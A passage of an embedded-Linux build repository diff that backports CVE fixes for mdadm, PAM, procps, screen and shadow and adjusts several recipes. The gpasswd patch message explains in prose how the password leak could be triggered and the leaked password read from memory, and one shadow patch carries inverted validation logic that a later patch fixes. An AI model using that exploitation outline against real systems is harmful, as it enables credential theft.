+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
+CVE: CVE-2023-28938
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Detail.c | 20 +++++++++-----------
+ 1 file changed, 9 insertions(+), 11 deletions(-)
+
+diff --git a/Detail.c b/Detail.c
+index ad56344f..d3af0ab5 100644
+--- a/Detail.c
++++ b/Detail.c
+@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
+ int spares = 0;
+ struct stat stb;
+ int failed = 0;
+- struct supertype *st;
++ struct supertype *st = NULL;
+ char *subarray = NULL;
+ int max_disks = MD_SB_DISKS; /* just a default */
+ struct mdinfo *info = NULL;
+- struct mdinfo *sra;
++ struct mdinfo *sra = NULL;
+ struct mdinfo *subdev;
+ char *member = NULL;
+ char *container = NULL;
+@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
+ if (!sra) {
+ if (md_get_array_info(fd, &array)) {
+ pr_err("%s does not appear to be an md device\n", dev);
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+ external = (sra != NULL && sra->array.major_version == -1 &&
+@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
+ sra->devs == NULL) {
+ pr_err("Array associated with md device %s does not exist.\n",
+ dev);
+- close(fd);
+- sysfs_free(sra);
+- return rv;
++ goto out;
+ }
+ array = sra->array;
+ } else {
+ pr_err("cannot get array detail for %s: %s\n",
+ dev, strerror(errno));
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+
+@@ -827,10 +823,12 @@ out:
+ close(fd);
+ free(subarray);
+ free(avail);
+- for (d = 0; d < n_devices; d++)
+- free(devices[d]);
++ if (devices)
++ for (d = 0; d < n_devices; d++)
++ free(devices[d]);
+ free(devices);
+ sysfs_free(sra);
++ free(st);
+ return rv;
+ }
+
+--
+cgit
+
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb
index 001d3331a7..ca326fd1cb 100644
--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool for managing software RAID under Linux"
HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
+DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
# Some files are GPLv2+ while others are GPLv2.
LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
file://include_sysmacros.patch \
file://0001-mdadm-skip-test-11spare-migration.patch \
+ file://CVE-2023-28736.patch \
+ file://CVE-2023-28938.patch \
"
SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb
index 491b892093..9822e86b0e 100644
--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
SUMMARY = "Compact getty terminal handler for virtual consoles only"
SECTION = "console/utils"
HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
+DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
LICENSE = "GPLv2"
PR = "r3"
diff --git a/meta/recipes-extended/minicom/minicom_2.7.1.bb b/meta/recipes-extended/minicom/minicom_2.7.1.bb
index 6c539c553b..79d06d20f9 100644
--- a/meta/recipes-extended/minicom/minicom_2.7.1.bb
+++ b/meta/recipes-extended/minicom/minicom_2.7.1.bb
@@ -26,3 +26,5 @@ do_install() {
}
RRECOMMENDS_${PN} += "lrzsz"
+
+RDEPENDS_${PN} += "ncurses-terminfo-base"
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03..3d35a17c92 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
S = "${WORKDIR}/newt-${PV}"
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
EXTRA_OECONF = "--without-tcl --with-python"
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
new file mode 100644
index 0000000000..33ac37b7f0
--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
+From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <matthias.gerstner@suse.de>
+Date: Wed, 27 Dec 2023 14:01:59 +0100
+Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
+ local DoS situations
+
+Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
+being placed in user controlled directories, causing the PAM module to
+block indefinitely during `openat()`.
+
+Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
+refer to a directory.
+
+With this the check whether the final path element is a directory
+becomes unnecessary, drop it.
+
+Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
+CVE: CVE-2024-22365
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ modules/pam_namespace/pam_namespace.c | 18 +-----------------
+ 1 file changed, 1 insertion(+), 17 deletions(-)
+
+diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
+index 2528cff86..f72d67189 100644
+--- a/modules/pam_namespace/pam_namespace.c
++++ b/modules/pam_namespace/pam_namespace.c
+@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ int dfd = AT_FDCWD;
+ int dfd_next;
+ int save_errno;
+- int flags = O_RDONLY;
++ int flags = O_RDONLY | O_DIRECTORY;
+ int rv = -1;
+ struct stat st;
+
+@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ rv = openat(dfd, dir, flags);
+ }
+
+- if (rv != -1) {
+- if (fstat(rv, &st) != 0) {
+- save_errno = errno;
+- close(rv);
+- rv = -1;
+- errno = save_errno;
+- goto error;
+- }
+- if (!S_ISDIR(st.st_mode)) {
+- close(rv);
+- errno = ENOTDIR;
+- rv = -1;
+- goto error;
+- }
+- }
+-
+ if (flags & O_NOFOLLOW) {
+ /* we are inside user-owned dir - protect */
+ if (protect_mount(rv, p, idata) == -1) {
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb
index bc72afe6ad..527a368e2d 100644
--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
file://pam-security-abstract-securetty-handling.patch \
file://pam-unix-nullok-secure.patch \
file://crypt_configure.patch \
+ file://CVE-2024-22365.patch \
"
SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb
index 1cfd9ec264..2d688c3700 100644
--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "Disk partition editing/resizing utility"
HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
SECTION = "console/tools"
@@ -22,7 +23,7 @@ EXTRA_OECONF = "--disable-device-mapper"
inherit autotools pkgconfig gettext texinfo ptest
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
do_compile_ptest() {
oe_runmake -C tests print-align print-max dup-clobber duplicate fs-resize print-flags
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
index 9f992d3e83..409a8f3896 100644
--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
index 7219c7d11e..068f0bd3f3 100644
--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl modules useful for manipulating date and time information"
HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
SECTION = "libs"
# You can redistribute it and/or modify it under the same terms as Perl itself.
LICENSE = "Artistic-1.0 | GPL-1.0+"
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
new file mode 100644
index 0000000000..50582a8649
--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
+From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
+From: Craig Small <csmall@dropbear.xyz>
+Date: Thu, 10 Aug 2023 21:18:38 +1000
+Subject: [PATCH] ps: Fix possible buffer overflow in -C option
+
+ps allocates memory using malloc(length of arg * len of struct).
+In certain strange circumstances, the arg length could be very large
+and the multiplecation will overflow, allocating a small amount of
+memory.
+
+Subsequent strncpy() will then write into unallocated memory.
+The fix is to use calloc. It's slower but this is a one-time
+allocation. Other malloc(x * y) calls have also been replaced
+by calloc(x, y)
+
+References:
+ https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
+ https://nvd.nist.gov/vuln/detail/CVE-2023-4016
+ https://gitlab.com/procps-ng/procps/-/issues/297
+ https://bugs.debian.org/1042887
+
+Signed-off-by: Craig Small <csmall@dropbear.xyz>
+
+CVE: CVE-2023-4016
+Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ NEWS | 1 +
+ ps/parser.c | 8 ++++----
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/NEWS b/NEWS
+index b9509734..64fa3da8 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,3 +1,5 @@
++ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297
++
+ procps-ng-3.3.16
+ ----------------
+ * library: Increment to 8:2:0
+diff --git a/ps/parser.c b/ps/parser.c
+index 248aa741..15873dfa 100644
+--- a/ps/parser.c
++++ b/ps/parser.c
+@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ const char *err; /* error code that could or did happen */
+ /*** prepare to operate ***/
+ node = malloc(sizeof(selection_node));
+- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
+ node->n = 0;
+ buf = strdup(arg);
+ /*** sanity check and count items ***/
+@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ } while (*++walk);
+ if(need_item) goto parse_error;
+ node->n = items;
++ node->u = calloc(items, sizeof(sel_union));
+ /*** actually parse the list ***/
+ walk = buf;
+ while(items--){
+@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
+ thisarg = ps_argc - 1; /* we must be at the end now */
+
+ pidnode = malloc(sizeof(selection_node));
+- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ pidnode->n = 0;
+
+ grpnode = malloc(sizeof(selection_node));
+- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
+ grpnode->n = 0;
+
+ sidnode = malloc(sizeof(selection_node));
+- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ sidnode->n = 0;
+
+ while(i--){
+--
+GitLab
+
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb
index 2810ebd285..ac27734a6f 100644
--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
inherit autotools gettext pkgconfig update-alternatives
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
file://sysctl.conf \
+ file://CVE-2023-4016.patch \
"
SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb
index e569f1074b..36e6775f9e 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
"
SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb
index c5da1e71ed..46ad7352d6 100644
--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index cb5b288c48..0f8a6f74f8 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
file://0001-Use-cross-compiled-rpcgen.patch \
"
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
new file mode 100644
index 0000000000..983b35c1b0
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
+Description: [CVE-2021-26937] Fix out of bounds array access
+Author: Michael Schröder <mls@suse.de>
+Bug-Debian: https://bugs.debian.org/982435
+Bug: https://savannah.gnu.org/bugs/?60030
+Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
+Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
+Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
+
+CVE: CVE-2021-26937
+Upstream-Status: Pending
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+--- a/encoding.c
++++ b/encoding.c
+@@ -43,7 +43,7 @@
+ # ifdef UTF8
+ static int recode_char __P((int, int, int));
+ static int recode_char_to_encoding __P((int, int));
+-static void comb_tofront __P((int, int));
++static void comb_tofront __P((int));
+ # ifdef DW_CHARS
+ static int recode_char_dw __P((int, int *, int, int));
+ static int recode_char_dw_to_encoding __P((int, int *, int));
+@@ -1263,6 +1263,8 @@
+ {0x30000, 0x3FFFD},
+ };
+
++ if (c >= 0xdf00 && c <= 0xdfff)
++ return 1; /* dw combining sequence */
+ return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
+ (cjkwidth &&
+ bisearch(c, ambiguous,
+@@ -1330,11 +1332,12 @@
+ }
+
+ static void
+-comb_tofront(root, i)
+-int root, i;
++comb_tofront(i)
++int i;
+ {
+ for (;;)
+ {
++ int root = i >= 0x700 ? 0x801 : 0x800;
+ debug1("bring to front: %x\n", i);
+ combchars[combchars[i]->prev]->next = combchars[i]->next;
+ combchars[combchars[i]->next]->prev = combchars[i]->prev;
+@@ -1396,9 +1399,9 @@
+ {
+ /* full, recycle old entry */
+ if (c1 >= 0xd800 && c1 < 0xe000)
+- comb_tofront(root, c1 - 0xd800);
++ comb_tofront(c1 - 0xd800);
+ i = combchars[root]->prev;
+- if (c1 == i + 0xd800)
++ if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
+ {
+ /* completely full, can't recycle */
+ debug("utf8_handle_comp: completely full!\n");
+@@ -1422,7 +1425,7 @@
+ mc->font = (i >> 8) + 0xd8;
+ mc->fontx = 0;
+ debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
+- comb_tofront(root, i);
++ comb_tofront(i);
+ }
+
+ #else /* !UTF8 */
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
new file mode 100644
index 0000000000..73caf9d81b
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ socket.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+ else
+ queryflag = -1;
+
+- Kill(m.m.command.apid,
++ if (CheckPid(m.m.command.apid)) {
++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++ }
++ else {
++ Kill(m.m.command.apid,
+ (queryflag >= 0)
+ ? SIGCONT
+ : SIG_BYE); /* Send SIG_BYE if an error happened */
+- queryflag = -1;
++ queryflag = -1;
++ }
+ }
+ break;
+ case MSG_COMMAND:
+--
+2.25.1
+
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb
index 4772eb6c7a..c4faa27023 100644
--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
file://0002-comm.h-now-depends-on-term.h.patch \
file://0001-fix-for-multijob-build.patch \
file://0001-Remove-more-compatibility-stuff.patch \
+ file://CVE-2021-26937.patch \
+ file://CVE-2023-24626.patch \
"
SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb
index 39e3a61df5..089bd11a55 100644
--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
SUMMARY = "Stream EDitor (text filtering utility)"
HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
new file mode 100644
index 0000000000..aea07ff361
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
+From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
+Date: Fri, 31 Mar 2023 14:46:50 +0200
+Subject: [PATCH] Overhaul valid_field()
+
+e5905c4b ("Added control character check") introduced checking for
+control characters but had the logic inverted, so it rejects all
+characters that are not control ones.
+
+Cast the character to `unsigned char` before passing to the character
+checking functions to avoid UB.
+
+Use strpbrk(3) for the illegal character test and return early.
+
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index fb51b582..53929248 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
+
+ /* For each character of field, search if it appears in the list
+ * of illegal characters. */
++ if (illegal && NULL != strpbrk (field, illegal)) {
++ return -1;
++ }
++
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+- if (strchr (illegal, *cp) != NULL) {
++ unsigned char c = *cp;
++ if (!isprint (c)) {
++ err = 1;
++ }
++ if (iscntrl (c)) {
+ err = -1;
+ break;
+ }
+ }
+
+- if (0 == err) {
+- /* Search if there are non-printable or control characters */
+- for (cp = field; '\0' != *cp; cp++) {
+- if (!isprint (*cp)) {
+- err = 1;
+- }
+- if (!iscntrl (*cp)) {
+- err = -1;
+- break;
+- }
+- }
+- }
+-
+ return err;
+ }
+
+--
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
new file mode 100644
index 0000000000..dbf4a508e9
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch
@@ -0,0 +1,54 @@
+From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001
+From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com>
+Date: Thu, 23 Mar 2023 23:39:38 +0000
+Subject: [PATCH] Added control character check
+
+Added control character check, returning -1 (to "err") if control characters are present.
+
+CVE: CVE-2023-29383
+Upstream-Status: Backport
+
+Reference to upstream:
+https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 11 +++++++----
+ 1 file changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index 640be931..fb51b582 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -21,9 +21,9 @@
+ *
+ * The supplied field is scanned for non-printable and other illegal
+ * characters.
+- * + -1 is returned if an illegal character is present.
+- * + 1 is returned if no illegal characters are present, but the field
+- * contains a non-printable character.
++ * + -1 is returned if an illegal or control character is present.
++ * + 1 is returned if no illegal or control characters are present,
++ * but the field contains a non-printable character.
+ * + 0 is returned otherwise.
+ */
+ int valid_field (const char *field, const char *illegal)
+@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal)
+ }
+
+ if (0 == err) {
+- /* Search if there are some non-printable characters */
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+ if (!isprint (*cp)) {
+ err = 1;
++ }
++ if (!iscntrl (*cp)) {
++ err = -1;
+ break;
+ }
+ }
+--
+2.34.1
+
diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
new file mode 100644
index 0000000000..75dbbad299
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch
@@ -0,0 +1,146 @@
+From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001
+From: Alejandro Colomar <alx@kernel.org>
+Date: Sat, 10 Jun 2023 16:20:05 +0200
+Subject: [PATCH] gpasswd(1): Fix password leak
+
+CVE: CVE-2023-4641
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904]
+
+How to trigger this password leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When gpasswd(1) asks for the new password, it asks twice (as is usual
+for confirming the new password). Each of those 2 password prompts
+uses agetpass() to get the password. If the second agetpass() fails,
+the first password, which has been copied into the 'static' buffer
+'pass' via STRFCPY(), wasn't being zeroed.
+
+agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and
+can fail for any of the following reasons:
+
+- malloc(3) or readpassphrase(3) failure.
+
+ These are going to be difficult to trigger. Maybe getting the system
+ to the limits of memory utilization at that exact point, so that the
+ next malloc(3) gets ENOMEM, and possibly even the OOM is triggered.
+ About readpassphrase(3), ENFILE and EINTR seem the only plausible
+ ones, and EINTR probably requires privilege or being the same user;
+ but I wouldn't discard ENFILE so easily, if a process starts opening
+ files.
+
+- The password is longer than PASS_MAX.
+
+ The is plausible with physical access. However, at that point, a
+ keylogger will be a much simpler attack.
+
+And, the attacker must be able to know when the second password is being
+introduced, which is not going to be easy.
+
+How to read the password after the leak?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Provoking the leak yourself at the right point by entering a very long
+password is easy, and inspecting the process stack at that point should
+be doable. Try to find some consistent patterns.
+
+Then, search for those patterns in free memory, right after the victim
+leaks their password.
+
+Once you get the leak, a program should read all the free memory
+searching for patterns that gpasswd(1) leaves nearby the leaked
+password.
+
+On 6/10/23 03:14, Seth Arnold wrote:
+> An attacker process wouldn't be able to use malloc(3) for this task.
+> There's a handful of tools available for userspace to allocate memory:
+>
+> - brk / sbrk
+> - mmap MAP_ANONYMOUS
+> - mmap /dev/zero
+> - mmap some other file
+> - shm_open
+> - shmget
+>
+> Most of these return only pages of zeros to a process. Using mmap of an
+> existing file, you can get some of the contents of the file demand-loaded
+> into the memory space on the first use.
+>
+> The MAP_UNINITIALIZED flag only works if the kernel was compiled with
+> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare.
+>
+> malloc(3) doesn't zero memory, to our collective frustration, but all the
+> garbage in the allocations is from previous allocations in the current
+> process. It isn't leftover from other processes.
+>
+> The avenues available for reading the memory:
+> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot)
+> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA)
+> - ptrace (requires ptrace privileges, mediated by YAMA)
+> - causing memory to be swapped to disk, and then inspecting the swap
+>
+> These all require a certain amount of privileges.
+
+How to fix it?
+~~~~~~~~~~~~~~
+
+memzero(), which internally calls explicit_bzero(3), or whatever
+alternative the system provides with a slightly different name, will
+make sure that the buffer is zeroed in memory, and optimizations are not
+allowed to impede this zeroing.
+
+This is not really 100% effective, since compilers may place copies of
+the string somewhere hidden in the stack. Those copies won't get zeroed
+by explicit_bzero(3). However, that's arguably a compiler bug, since
+compilers should make everything possible to avoid optimizing strings
+that are later passed to explicit_bzero(3). But we all know that
+sometimes it's impossible to have perfect knowledge in the compiler, so
+this is plausible. Nevertheless, there's nothing we can do against such
+issues, except minimizing the time such passwords are stored in plain
+text.
+
+Security concerns
+~~~~~~~~~~~~~~~~~
+
+We believe this isn't easy to exploit. Nevertheless, and since the fix
